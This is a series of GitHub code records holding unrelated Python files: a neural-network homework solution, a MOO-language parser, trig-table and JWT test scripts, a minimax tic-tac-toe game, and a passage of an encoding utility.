def __init__(self, hidden_dims, input_dim=3*32*32, num_classes=10,\n dropout=0, use_batchnorm=False, reg=0.0,\n weight_scale=1e-2, dtype=np.float32, seed=None):\n \"\"\"\n Initialize a new FullyConnectedNet.\n \n Inputs:\n - hidden_dims: A list of integers giving the size of each hidden layer.\n - input_dim: An integer giving the size of the input.\n - num_classes: An integer giving the number of classes to classify.\n - dropout: Scalar between 0 and 1 giving dropout strength. If dropout=0 then\n the network should not use dropout at all.\n - use_batchnorm: Whether or not the network should use batch normalization.\n - reg: Scalar giving L2 regularization strength.\n - weight_scale: Scalar giving the standard deviation for random\n initialization of the weights.\n - dtype: A numpy datatype object; all computations will be performed using\n this datatype. 
float32 is faster but less accurate, so you should use\n float64 for numeric gradient checking.\n - seed: If not None, then pass this random seed to the dropout layers. This\n will make the dropout layers deteriminstic so we can gradient check the\n model.\n \"\"\"\n self.use_batchnorm = use_batchnorm\n self.use_dropout = dropout > 0\n self.reg = reg\n self.num_layers = 1 + len(hidden_dims)\n self.dtype = dtype\n self.params = {}\n\n # ================================================================ #\n # YOUR CODE HERE:\n # Initialize all parameters of the network in the self.params dictionary.\n # The weights and biases of layer 1 are W1 and b1; and in general the \n # weights and biases of layer i are Wi and bi. The\n # biases are initialized to zero and the weights are initialized\n # so that each parameter has mean 0 and standard deviation weight_scale.\n # ================================================================ #\n \n dims = [input_dim] + hidden_dims + [num_classes]\n for i in range(self.num_layers):\n self.params['W' + str(i + 1)] = np.random.normal(0, weight_scale, size=(dims[i], dims[i + 1]))\n self.params['b' + str(i + 1)] = np.zeros((dims[i + 1], 1))\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n \n # When using dropout we need to pass a dropout_param dictionary to each\n # dropout layer so that the layer knows the dropout probability and the mode\n # (train / test). You can pass the same dropout_param to each dropout layer.\n self.dropout_param = {}\n if self.use_dropout:\n self.dropout_param = {'mode': 'train', 'p': dropout}\n if seed is not None:\n self.dropout_param['seed'] = seed\n \n # With batch normalization we need to keep track of running means and\n # variances, so we need to pass a special bn_param object to each batch\n # normalization layer. 
You should pass self.bn_params[0] to the forward pass\n # of the first batch normalization layer, self.bn_params[1] to the forward\n # pass of the second batch normalization layer, etc.\n self.bn_params = []\n if self.use_batchnorm:\n self.bn_params = [{'mode': 'train'} for i in np.arange(self.num_layers - 1)]\n \n # Cast all parameters to the correct datatype\n for k, v in self.params.items():\n self.params[k] = v.astype(dtype)\n\n\n def loss(self, X, y=None):\n \"\"\"\n Compute loss and gradient for the fully-connected net.\n\n Input / output: Same as TwoLayerNet above.\n \"\"\"\n X = X.astype(self.dtype)\n mode = 'test' if y is None else 'train'\n\n # Set train/test mode for batchnorm params and dropout param since they\n # behave differently during training and testing.\n if self.dropout_param is not None:\n self.dropout_param['mode'] = mode \n if self.use_batchnorm:\n for bn_param in self.bn_params:\n bn_param[mode] = mode\n\n scores = None\n \n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the forward pass of the FC net and store the output\n # scores as the variable \"scores\".\n # ================================================================ #\n\n param = {}\n h = {}\n h[0] = [X]\n\n for i in range(self.num_layers):\n param[i + 1] = affine_forward(h[i][0], self.params['W' + str(i + 1)], self.params['b' + str(i + 1)])\n h[i + 1] = relu_forward(param[i + 1][0])\n\n scores = param[self.num_layers][0]\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n \n # If test mode return early\n if mode == 'test':\n return scores\n\n loss, grads = 0.0, {}\n # ================================================================ #\n # YOUR CODE HERE:\n # Implement the backwards pass of the FC net and store the gradients\n # in the grads dict, so that grads[k] is the gradient of self.params[k]\n # Be sure your L2 regularization includes a 0.5 factor.\n # ================================================================ #\n\n loss, dx = softmax_loss(scores, y)\n weights = [self.params['W' + str(i + 1)] for i in range(self.num_layers)]\n loss += 0.5 * self.reg * sum([np.linalg.norm(weight, 'fro')**2 for weight in weights])\n\n das = {}\n dhs = {}\n dws = {}\n dbs = {}\n das[self.num_layers] = dx\n\n for i in range(self.num_layers)[::-1]:\n dh, dw, db = affine_backward(das[i + 1], param[i + 1][1])\n dhs[i] = dh \n dws[i + 1] = dw\n dbs[i + 1] = db\n if i != 0:\n das[i] = relu_backward(dhs[i], h[i][1])\n\n for i in range(self.num_layers):\n grads['W' + str(i + 1)] = dws[i + 1] + self.reg * self.params['W' + str(i + 1)] \n grads['b' + str(i + 1)] = dbs[i + 1].T\n\n # ================================================================ #\n # END YOUR CODE HERE\n # ================================================================ #\n return loss, grads\n","repo_name":"Wangxh329/Neural-Networks-and-Deep-Learning","sub_path":"homework/hw3/code/nndl/fc_net.py","file_name":"fc_net.py","file_ext":"py","file_size_in_byte":12651,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"5027600060","text":"from pyparsing import *\nfrom language import *\n\n\nclass Parser(object):\n def __init__(self):\n self.parser = None\n self.init_parser()\n \n def nest(self, tokens):\n return [list(tokens)]\n \n def init_parser(self):\n \"\"\" phase 1:\n most important part is to build the meta-parser for 
\"expr\". expr represents any atomic action that returns a value, and the bulk of\n the code in any program will consist primarily of exprs and flow control. expr is heavily recursive, because most types of expr can\n take another expr as an input value.\n \"\"\"\n point = Literal( \".\" )\n plus = Literal( \"+\" )\n minus = Literal( \"-\" )\n mult = Literal( \"*\" )\n div = Literal( \"/\" )\n lpar = Literal( \"(\" ).suppress()\n rpar = Literal( \")\" ).suppress()\n llbr = Literal( \"[\" ).suppress()\n rlbr = Literal( \"]\" ).suppress()\n addop = plus | minus\n multop = mult | div\n expop = Literal( \"^\" )\n quote = Literal( '\"' )\n excl = Literal( \"!\" )\n call = Literal( \":\" )\n endl = Literal( \";\" )\n lisep = Literal( \",\" ).suppress()\n objn = Literal( \"#\" )\n ref = Literal( \"$\" )\n assign = Literal( \"=\" )\n flatten = Literal( \"@\" )\n neg = excl.copy()\n \n\n expr = Forward()\n ident = Word(alphas+\"_\", alphas+nums+\"_\")\n ident.setParseAction(VMIdent.parse)\n variable = Word(alphas+\"_\", alphas+nums+\"_\")\n variable.setParseAction(VMVariable.parse)\n \n \n integer = Word( \"+-\"+nums, nums )\n fnumber = Combine( integer + \n Optional( point + Optional( Word( nums ) ) ) +\n Optional( CaselessLiteral('e') + Word( \"+-\"+nums, nums ) ) )\n objref = objn + Word( \"+-\"+nums, nums )\n objref.setParseAction(VMObjRef.parse)\n coreref = (ref + ident)\n coreref.setParseAction(VMCoreRef.parse)\n bexpr = (lpar + expr + rpar).setParseAction(self.nest)\n objrefexpr = bexpr | coreref | variable | objref\n identexpr = bexpr | ident\n propref = (objrefexpr + point + ident).setParseAction(VMPropRef.parse) | coreref\n fileref = (objrefexpr + excl + ident).setParseAction(VMFileRef.parse)\n\n argspec = Optional(delimitedList(expr))\n argspec.setParseAction(StackToList.parse)\n funccall = objrefexpr + call + identexpr + lpar + argspec + rpar\n \n fnumber.setParseAction(VMFloat.parse)\n integer.setParseAction(VMInteger.parse)\n funccall.setParseAction(CallFunc.parse)\n \n stringlit = QuotedString(quoteChar='\"', escChar='\\\\').setParseAction(VMString.parse)\n \n atom = Forward()\n bifunction = (ident + lpar + argspec + rpar).setParseAction(CallBuiltin.parse)\n \n flatexpr = Optional(flatten) + expr\n flatexpr.setParseAction(Flatten.parse)\n listlit = llbr + Optional(flatexpr) + ZeroOrMore(lisep + flatexpr) + rlbr\n literal = integer | fnumber | stringlit | listlit | objref\n \n atom << (Optional(minus) + ZeroOrMore(neg) + (propref | literal | bifunction | bexpr | variable | funccall | fileref)).setParseAction(UnaryOp.parse)\n atom = atom.streamline()\n \n \n # by defining exponentiation as \"atom [ ^ factor ]...\" instead of \"atom [ ^ atom ]...\", we get right-to-left exponents, instead of left-to-righ\n # that is, 2^3^2 = 2^(3^2), not (2^3)^2.\n factor = Forward()\n factor << atom + ZeroOrMore( (expop + factor).setParseAction(ArithExp.parse) )\n factor = factor.streamline()\n \n term = factor + ZeroOrMore( (multop + factor).setParseAction(ArithMul.parse) )\n #term.setParseAction(self.nest)\n mathexpr = term + ZeroOrMore( (addop + term).setParseAction(ArithAdd.parse) )\n #mathexpr.setParseAction(self.nest)\n \n opeq = Literal('==')\n opneq = Literal('!=')\n opgteq = Literal('<=')\n oplteq = Literal('>=')\n oplt = Literal('<')\n opgt = Literal('>')\n opin = Keyword('in')\n \n opcmp = opeq | opneq | opgteq | oplteq | oplt | opgt | opin\n eqexpr = mathexpr + Optional( (opcmp + mathexpr).setParseAction(BoolCompare.parse) )\n \n opand = Literal('&&') | Keyword('and')\n opor = Literal('||') 
| Keyword('or')\n opxor = Literal('~~') | Keyword('xor')\n \n opbool = opand | opor | opxor\n boolexpr = eqexpr + ZeroOrMore( (opbool + eqexpr).setParseAction(BoolLogic.parse) )\n \n \n assignable = variable | propref | fileref\n assignexpr = Optional(assignable + assign) + boolexpr\n expr << assignexpr.setParseAction(Assignment.parse)\n expr = expr.streamline()\n\n \n \n \"\"\" phase 2:\n now that expr is built, we can move on to handling flow control statements, and after that the structure of the program\n is mostly defined\n \"\"\"\n \n ifstart = (Keyword(\"if\") + bexpr)\n ifelseif = (Keyword(\"elseif\") + bexpr)\n ifelse = Keyword(\"else\")\n ifend = Keyword(\"endif\")\n trystart = Keyword(\"try\")\n tryexcept = (Keyword(\"except\") + variable)\n tryelse = Keyword(\"else\")\n tryfinally = Keyword(\"finally\")\n tryend = Keyword(\"endtry\")\n whilestart = (Keyword(\"while\") + bexpr)\n whileend = Keyword(\"endwhile\")\n forstart = (Keyword(\"for\") + variable + Keyword(\"in\") + bexpr)\n forend = Keyword(\"endfor\")\n\n kwdbreak = Keyword(\"break\").setParseAction(LoopBreak)\n kwdcontinue = Keyword(\"continue\").setParseAction(LoopContinue)\n kwdreturn = Keyword(\"return\")\n\n rtnexpr = (kwdreturn + expr).setParseAction(KeywordReturn.parse)\n line = expr | rtnexpr\n lline = expr | rtnexpr | kwdcontinue | kwdbreak\n exprblock = ZeroOrMore(line + endl)\n lexprblock = ZeroOrMore(lline + endl)\n\n block = Forward()\n lblock = Forward()\n ifblock = ifstart + block + ZeroOrMore(ifelseif + block) + Optional(ifelse + block) + ifend\n tryblock = trystart + block + Optional(tryexcept + block + Optional(tryelse + block)) + Optional(tryfinally + block) + tryend\n iflblock = ifstart + lblock + ZeroOrMore(ifelseif + lblock) + Optional(ifelse + lblock) + ifend\n trylblock = trystart + lblock + Optional(tryexcept + lblock + Optional(tryelse + lblock)) + Optional(tryfinally + block) + tryend\n whileblock = whilestart + lblock + whileend\n forblock = forstart + lblock + forend\n \n ifblock.setParseAction(IfBlock.parse)\n tryblock.setParseAction(TryBlock.parse)\n iflblock.setParseAction(IfBlock.parse)\n trylblock.setParseAction(TryBlock.parse)\n whileblock.setParseAction(WhileBlock.parse)\n forblock.setParseAction(ForeachBlock.parse)\n \n # blocks are used for code blocks that are outside a loop. 
Inside a loop, all code blocks are lblocks\n # which allow loop-control keywords like break and continue (except try-finally, it wouldn't make sense)\n \n block << (exprblock + Optional(ifblock | tryblock | whileblock | forblock) + exprblock)\n lblock << (lexprblock + Optional(iflblock | trylblock | whileblock | forblock) + lexprblock)\n\n block = block.streamline()\n lblock = lblock.streamline()\n \n block.setParseAction(self.nest)\n lblock.setParseAction(self.nest)\n\n endl.setParseAction(DiscardStack.parse)\n self.parser = block\n #print(argspec.parseString(\"hello(hi.xyz)\", parseAll=True))\n #print(block.parseString(u\"hi.xyz + #555.test;\", parseAll=True))\n #print(block.parseString(\"\"\"serverlog();\"\"\"))\n\n def parse(self, data):\n rv = self.parser.parseString(data, parseAll=True)\n \n return optimizer.optimize(rv)\n\n def parse_command(self, line):\n ls = line.split(' ')\n cmd = ls[0]\n argstr = ' '.join(ls[1:])\n vars = {\n 'cmdstr': line,\n 'cmd': cmd,\n 'argstr': argstr,\n 'args': [x.strip() for x in ls[1:] if x.strip() != '']\n }\n \n return [cmd, vars]\n\n def test(self):\n #print(self.parse(u\"if (1) #740.xyz + -hello.world; endif\"))\n \n data = open(\"test.moo\", \"r\", encoding=\"utf-8\").read()\n rv = self.parse(data)\n print(rv)\n return rv\n \n \nstatic_parser = Parser()\n\nif __name__ == \"__main__\":\n p = Parser()\n p.test()\n","repo_name":"cecilkorik/mung","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":8617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34061356483","text":"import math\nimport matplotlib.pyplot as plt\n\ndef gen_array(func):\n for n in range(1024):\n n = round(func((float(n) / 1024.0)*math.pi*2) * 2**16)\n if n > 2**31 - 1 :\n n = 2**32 - 1\n if n < -(2**31) :\n n = -(2**31)\n if n < 0 :\n n += 2**32\n \n yield hex(n)\n\nh = open(\"matharrays.h\",\"w\")\n\nh.write(\n\"\"\"#ifndef H_MATH_ARRAYS \n#define H_MATH_ARRAYS\n#include \n#include \n\"\"\")\n\nh.write(\"extern int32_t tan_a[1024];\\n\")\n\nh.write(\"extern int32_t cot_a[1024];\\n\")\n\nh.write(\"extern int32_t sin_a[1024];\\n\")\n\nh.write(\"extern int32_t cos_a[1024];\\n\")\n\nh.write(\"#endif\")\n\nh.close()\n\nc = open(\"matharrays.c\",\"w\")\n\nc.write(\n\"\"\"#include \\n\"\"\")\n\nc.write(\"int32_t tan_a[1024] = {\")\nc.write(\", \".join(list(gen_array(lambda a: math.tan(a)))))\nc.write(\"};\\n\")\n\nc.write(\"int32_t cot_a[1024] = {\")\nc.write(\", \".join(list(gen_array(lambda a: 1/math.tan(a) if math.tan(a) != 0 else 0xFFFFFFFF))))\nc.write(\"};\\n\")\n\nc.write(\"int32_t sin_a[1024] = {\")\nc.write(\", \".join(list(gen_array(lambda a: math.sin(a)))))\nc.write(\"};\\n\")\n\nc.write(\"int32_t cos_a[1024] = {\")\nc.write(\", \".join(list(gen_array(lambda a: math.cos(a)))))\nc.write(\"};\\n\")\n\nc.close()\n","repo_name":"emwebb/3dmaze","sub_path":"genmatharray.py","file_name":"genmatharray.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18694946678","text":"import os\nimport jwt\nfrom unittest import TestCase\nfrom json_web_token import create_token\n\nSECRET_KEY = os.environ.get('SECRET_KEY')\n\n\nclass TokenCreationTestCase(TestCase):\n ''' create token test '''\n\n def test_create_token_returns_valid_jwt(self):\n # create test user\n user = {\n 'username': 'test_user',\n 'is_admin': False,\n }\n\n # create new token with user data\n token = create_token(user)\n 
self.assertIsInstance(token, str)\n\n # decode the token to verify its contents\n payload = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])\n self.assertIsInstance(payload, dict)\n self.assertEqual(payload['username'], user['username'])\n self.assertEqual(payload['is_admin'], user['is_admin'])\n\n def test_create_token_with_invalid_user(self):\n # create invalid user\n user = {\n 'is_admin': True,\n }\n\n # create new token with invalid user data\n self.assertRaises(KeyError, create_token, user)\n\n def test_create_token_with_no_user(self):\n user = None\n\n self.assertRaises(TypeError, create_token, user)","repo_name":"brianhjoo/Pixie","sub_path":"pixie-backend/helpers/tests_token.py","file_name":"tests_token.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1276785268","text":"import torch\n\n\ndef ONInvariantMap(xs):\n out = torch.zeros_like(xs)\n out[:, 0] = torch.norm(xs, dim=1)\n return out\n\n\ndef ENInvariantMap(xs):\n def center_around_0(inp):\n # Center around 0 for translation invariance\n CoM = torch.mean(inp, dim=1)\n centered = inp - CoM[:, None, :]\n return centered\n\n def order(centered):\n # Order by radius to make permutation invariant\n r = torch.sqrt(centered[:, :, 0] ** 2 + centered[:, :, 1] ** 2)\n order = torch.argsort(r)\n sorted = centered[torch.arange(order.size(0)).unsqueeze(1).repeat((1, order.size(1))), order]\n return sorted\n\n def rotate(centered, sorted):\n r = torch.sqrt(centered[:, :, 0] ** 2 + centered[:, :, 1] ** 2)\n # Rotate to x axis\n top_1 = sorted[:, -1]\n top_r_1 = r.max(dim=1)[0]\n norm_1 = top_1 / top_r_1[:, None]\n t0 = torch.cat([norm_1[:, 0, None], -norm_1[:, 1, None]], dim=1).T\n t1 = torch.cat([norm_1[:, 1, None], norm_1[:, 0, None]], dim=1).T\n G_1 = torch.stack([t0, t1]).permute([2, 1, 0])[:, None, :, :]\n rotated_1 = torch.matmul(G_1, sorted[:, :, :, None]).squeeze()\n return rotated_1\n\n inp = xs.view(-1, 4, 2)\n centered = center_around_0(inp)\n sorted = order(centered)\n rotated = rotate(centered, sorted)\n\n s_1 = sorted.size()\n input = rotated.view((s_1[0], s_1[1] * s_1[2]))\n\n return input\n","repo_name":"NeurIPS21-3353/CodeRepo","sub_path":"samplers/svgd_sampling/kernels/maps/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72030058027","text":"# Messages\nRUN_AWAY = \"You ran away!\"\nQUIT = \"Thanks for playing!\"\nGAME_OVER_WIN = 'Game Over, You Win!'\nGAME_OVER_LOSE = \"Game Over, You Lose.\"\nSTART_BATTLE = \"Fight!\"\nACTIONS_PROMPT = \"Choose action [F]ight/[C]haracter/[Q]uit: \"\nBATTLE_PROMPT = \"Choose action [A]ttack/[R]un: \"\nGAME_START = \"Welcome to the game!\"\n\n# Enemy Names\nENEMY_NAME = ['Orc', 'Goblin', 'Troll', 'Bat']\n","repo_name":"Dkothand/python_command_rpg_game","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9095536579","text":"\"\"\"\r\nA console-based Tic-Tic-Toe game that uses the MiniMax algorithm for a perfect AI.\r\nIt is impossible to win this game against the bot, best case scenario is a tie.\r\n\r\nAuthor: Josh Graham\r\nDate: 5/30/2020\r\n\"\"\"\r\n\r\nimport random\r\nimport sys\r\n\r\nclass Player:\r\n \"\"\"\r\n This class defines a player.\r\n\r\n Attributes:\r\n name (str): The name of the 
player.\r\n symbol (str): A single character to uniquely represent the player (usually 'X' or 'O').\r\n \"\"\"\r\n\r\n def __init__(self, name, symbol):\r\n \"\"\"\r\n The constructor for the Player class.\r\n \r\n Parameters:\r\n name (str): The name of the player.\r\n symbol (str): A single character to uniquely represent the player (usually 'X' or 'O'). \r\n \"\"\"\r\n\r\n self.name = name\r\n self.symbol = symbol\r\n\r\nclass Board:\r\n \"\"\"\r\n This class defines the board to be used for the game.\r\n\r\n Attributes:\r\n x (int): An x coordinate for the board\r\n y (int): A y coordinate for the board\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n The constructor for the Board class.\r\n\r\n Generates an empty game board.\r\n \"\"\"\r\n\r\n self.board = [['-', '-', '-'],\r\n ['-', '-', '-'],\r\n ['-', '-', '-']]\r\n\r\n def show_board(self):\r\n \"\"\"Displays the current game board to the user by printing it to the console.\"\"\"\r\n\r\n for row in self.board:\r\n for col in row:\r\n print(col, end=\" \")\r\n print(\"\")\r\n\r\n def set_player(self, player, x, y):\r\n \"\"\"\r\n Places the symbol of the player on to the board at a specified position.\r\n\r\n If the player is the bot, the ai function is called for choosing it's position.\r\n\r\n Parameters:\r\n player (obj): The current player object whose turn it is.\r\n x (int): The x coordinate of where the player is placing their symbol.\r\n y (int): The y coordinate of where the player is placing their symbol.\r\n \"\"\"\r\n\r\n if(player.name == \"Bot\"):\r\n # Calls the ai function to get the best possible coordinates\r\n best_x, best_y = ai(self, player)\r\n self.board[best_x][best_y] = player.symbol\r\n else:\r\n self.board[x][y] = player.symbol\r\n\r\n def game_state(self):\r\n \"\"\"\r\n Checks if the game has been won.\r\n\r\n Returns:\r\n bool: True if won, False if not.\r\n str: 'X', 'O', or None, depending on if there is a winner, and who it is.\r\n \"\"\"\r\n\r\n # Checks horizontal and vertical columns\r\n for i in range(3):\r\n if(self.board[i][0] == 'X' and self.board[i][1] == 'X' and self.board[i][2] == 'X'):\r\n return True, 'X'\r\n elif(self.board[i][0] == 'O' and self.board[i][1] == 'O' and self.board[i][2] == 'O'):\r\n return True, 'O'\r\n elif(self.board[0][i] == 'X' and self.board[1][i] == 'X' and self.board[2][i] == 'X'):\r\n return True, 'X'\r\n elif(self.board[0][i] == 'O' and self.board[1][i] == 'O' and self.board[2][i] == 'O'):\r\n return True, 'O'\r\n # Checks the diagonals\r\n if(self.board[0][0] == 'X' and self.board[1][1] == 'X' and self.board[2][2] == 'X' or\r\n self.board[0][2] == 'X' and self.board[1][1] == 'X' and self.board[2][0] == 'X'):\r\n return True, 'X'\r\n elif(self.board[0][0] == 'O' and self.board[1][1] == 'O' and self.board[2][2] == 'O' or\r\n self.board[0][2] == 'O' and self.board[1][1] == 'O' and self.board[2][0] == 'O'):\r\n return True, 'O'\r\n\r\n return False, None # If no winner is found this is returned\r\n\r\n def check_pos(self, x, y):\r\n \"\"\"\r\n Checks if a supplied position has already been taken or if its open.\r\n\r\n Parameters:\r\n x (int): The x coordinate of the position to be checked.\r\n y (int): The y coordinate of the position to be checked.\r\n\r\n Returns:\r\n bool: True if the position is open, False if the position is taken.\r\n \"\"\"\r\n\r\n if(self.board[x][y] == '-'):\r\n return True\r\n return False\r\n\r\n def board_full(self):\r\n \"\"\"\r\n Checks if every position on the board has been filled (therefore the game will end as a tie).\r\n\r\n 
Returns:\r\n bool: True if the board has every position filled, False if there are still spots available.\r\n \"\"\"\r\n\r\n for row in self.board:\r\n for col in row:\r\n if(col == '-'):\r\n return False\r\n return True\r\n\r\ndef make_play(board, player):\r\n \"\"\"\r\n Allows the user to select which position they would like to place their symbol on the board.\r\n\r\n The position is verified to be valid before moving onto the set_player method. If the player\r\n is the bot, it goes straight to the set_player method, which goes to the ai function.\r\n\r\n Parameters:\r\n board (obj): The current board object.\r\n player (obj): the current player object.\r\n \"\"\"\r\n\r\n board.show_board()\r\n # dictionary of all possible moves where the key is a numbered position and the value is the coordinates\r\n moves = {\r\n 1: [0, 0], 2: [0, 1], 3: [0, 2],\r\n 4: [1, 0], 5: [1, 1], 6: [1, 2],\r\n 7: [2, 0], 8: [2, 1], 9: [2, 2],\r\n }\r\n\r\n if(player.name == \"Bot\"):\r\n board.set_player(player, 0, 0)\r\n else: \r\n free_pos = False\r\n # This loop guarantees that the position the user chooses is not already taken\r\n while(free_pos == False):\r\n # This loop guarantees that the user chooses a position the is possible on the board (1-9)\r\n while(True):\r\n try:\r\n move = int(input(\"Choose where you would like to make your play (1 - 9): \"))\r\n if(move < 10 and move > 0):\r\n break\r\n else:\r\n print(\"Please try again, you must enter a number from 1-9\")\r\n except ValueError:\r\n print(\"Please try again, you must enter a number from 1-9\")\r\n xy = moves[move]\r\n # Checks if the chosen move is available \r\n free_pos = board.check_pos(xy[0], xy[1])\r\n # If the position is valid, the set_player method is called\r\n board.set_player(player, xy[0], xy[1])\r\n\r\ndef ai(state, player):\r\n \"\"\"\r\n The best possible move is found for the bot to make. \r\n \r\n This is done by looping through every free position on the board, and calling the minimax function \r\n to \"score\" each position. Whichever position has the best score, becomes the move the bot uses.\r\n\r\n Parameters:\r\n state (obj): The current board object.\r\n player (obj): the current player object.\r\n\r\n Returns\r\n best_move[0] (int): the row coordinate of the best move.\r\n best_move[1] (int): the column coordinate of the best move.\r\n \"\"\"\r\n best_score = -10000 # Sets the intial best score at an impossibly low value\r\n # Loops through every possible position in the current board\r\n for row in range(len(state.board)):\r\n for col in range(len(state.board[row])):\r\n # Checks if the current position is empty\r\n if(state.board[row][col] == \"-\"):\r\n state.board[row][col] = player.symbol\r\n # Minimax algorithm is applied to the board with the current position taken by the bot\r\n score = minimax(state, 0, False) \r\n state.board[row][col] = \"-\" # Removes symbol from the board for the next loop\r\n if(score > best_score):\r\n best_score = score\r\n best_move = [row, col]\r\n return best_move[0], best_move[1]\r\n\r\ndef minimax(state, depth, max_or_min):\r\n \"\"\"\r\n Recursively finds the best possible move to be made on the current game board.\r\n\r\n Scores are given to the maximizing and minimizing player based on their chances of winning the game \r\n as each possible position is \"played\". Whatever position gives the end state with the best maximizing \r\n score and worst minimizing score is the optimal position for the bot.\r\n\r\n Parameters:\r\n state (obj): this is the gameboard object. 
It could be the current board, or one simulated for \r\n the algorithm.\r\n depth (int): The current depth of the game/algorithm. Basically how many turns have been played.\r\n\r\n Returns:\r\n int: the score of the current play being made.\r\n \"\"\"\r\n\r\n # Finds if the game has been won and for which player\r\n g_state, symb = state.game_state()\r\n # This is the terminal condition, if the game has been won or tied (board is full)\r\n if(state.board_full() or g_state):\r\n if(g_state == True and symb == 'X'):\r\n return -10\r\n elif(g_state == True and symb == 'O'):\r\n return 10\r\n elif(g_state == False):\r\n return 0\r\n\r\n if(max_or_min):\r\n # Impossibly low score set for the maximizing player, so that any move will replace it\r\n best_score = -10000\r\n # Loops through every possible position\r\n for row in range(len(state.board)):\r\n for col in range(len(state.board[row])):\r\n # Loops through every possible position\r\n if(state.board[row][col] == \"-\"):\r\n state.board[row][col] = \"O\"\r\n # The function is recursively called, with the depth increased and its the minimizing player's turn\r\n score = minimax(state, depth + 1, False)\r\n state.board[row][col] = \"-\" # Removes symbol from the board for the next loop\r\n if(score > best_score):\r\n best_score = score \r\n return best_score\r\n else:\r\n # Impossibly high score set for the minimizing player, so that any move will replace it\r\n best_score = 10000\r\n # Loops through every possible position\r\n for row in range(len(state.board)):\r\n for col in range(len(state.board[row])):\r\n # Loops through every possible position\r\n if(state.board[row][col] == \"-\"):\r\n state.board[row][col] = \"X\"\r\n # The function is recursively called, with the depth increased and its the maximizing player's turn\r\n score = minimax(state, depth + 1, True)\r\n state.board[row][col] = \"-\" # Removes symbol from the board for the next loop\r\n if(score < best_score):\r\n best_score = score \r\n return best_score\r\n\r\ndef main():\r\n \"\"\"This is where the code will begin and also where the main game loop is.\"\"\"\r\n\r\n game_board = Board()\r\n # Introduction to game\r\n print(\"\\nWelcome to Tic Tac Toe! Please select what you would like to play.\")\r\n game_type = input(\"1. Single player against AI.\\n2. 2 player with another person.\\n3. Quit.\\n\")\r\n\r\n if(game_type == \"1\"):\r\n name = input(\"What is your name? \")\r\n p1 = Player(name, 'X')\r\n p2 = Player(\"Bot\", 'O')\r\n elif(game_type == \"2\"):\r\n name = input(\"What is the name of the first player? \")\r\n p1 = Player(name, 'X')\r\n name = input(\"What is the name of the second player? 
\")\r\n p2 = Player(name, 'O')\r\n else:\r\n sys.exit()\r\n print(\"\\nPlayer 1: \" + p1.name + \"\\t Symbol: \" + p1.symbol)\r\n print(\"Player 2: \" + p2.name + \"\\t Symbol: \" + p2.symbol + \"\\n\")\r\n # Generates a random number to determine who goes first\r\n rand = random.random()\r\n if(rand > .5):\r\n print(p1.name + \" goes first!\")\r\n turn = 1\r\n else:\r\n print(p2.name + \" goes first!\")\r\n turn = -1\r\n\r\n # MAIN GAME LOOP\r\n while(game_type == \"1\" or game_type == \"2\"):\r\n if(turn == 1):\r\n print( \"\\n\" + p1.name + \" it is your turn.\")\r\n make_play(game_board, p1)\r\n else:\r\n print(\"\\n\" + p2.name + \" it is your turn.\")\r\n make_play(game_board, p2)\r\n # Checks if the game has been won and by whom\r\n g_state, symb = game_board.game_state()\r\n if(g_state):\r\n if(turn == 1):\r\n game_board.show_board()\r\n print(p1.name + \" has won the game!\")\r\n else:\r\n game_board.show_board()\r\n print(p2.name + \" has won the game!\")\r\n break\r\n\r\n if(game_board.board_full() == True):\r\n print(\"\")\r\n game_board.show_board()\r\n print(\"The game has ended as a draw.\")\r\n break\r\n\r\n turn *= -1 # this switches whose turn it is each round\r\n\r\nmain() # starts the game","repo_name":"JoshGraham14/Tic-Tac-Toe-Minimax","sub_path":"tictactoe_minimax.py","file_name":"tictactoe_minimax.py","file_ext":"py","file_size_in_byte":12868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23255933139","text":"#https://www.hackerrank.com/challenges/counting-valleys/problem\n\nsteps=int(input())\npath=input()\n\nres=0\nans=0\nfor i in range(steps):\n if (path[i]=='U'): \n res+=1\n else:\n res-=1\n if (path[i]=='U' and res==0):\n ans+=1\nprint(ans)","repo_name":"thebadcoder96/HackerRank","sub_path":"Warm-Up/countingvalleys.py","file_name":"countingvalleys.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6901720366","text":"#!python 3\n#coding=utf-8\nimport base64,urllib.parse,hashlib\n\nclass coder:\n def __init__(self):\n self.func_list=[('base64编码','b64enc'),('base64解码','b64dec'),('URL编码','urlenc'),('URL解码','urldec'),('ip转换长整数','ip2int'),('长整数转换ip','int2ip'),('md5转换','md5enc')]\n pass\n\n def ip2int(self,ip): #IP地址转换为长整数\n ips=ip.split('.')\n res=0\n try:\n for i in range(4):\n res=res+int(ips[i])*256**(3-i)\n except Exception as e:\n res='Please input correct ip address!'\n return res\n\n def int2ip(self,li): #长整数转换为ip地址\n try:\n li=int(li)\n if li < 4294967296 and li > 16777215:\n res=[]\n ip=li\n for j in range(4):\n buf=divmod(ip,256**(3-j))\n ip=buf[1]\n res.append(buf[0])\n restr=str(res[0])+'.'+str(res[1])+'.'+str(res[2])+'.'+str(res[3])\n else:\n restr='Data too big or too small!'\n except Exception as e:\n restr='Input not a valid ip int value!'\n return restr\n\n\n def b64dec(self,string): #base64解码函数\n string=str(string)\n if string[-2]!='=':\n string+='=='\n elif string[-1]!='=':\n string+='='\n try:\n res=base64.b64decode(string).decode('utf-8')\n except Exception as e:\n res='Input not a valid base64 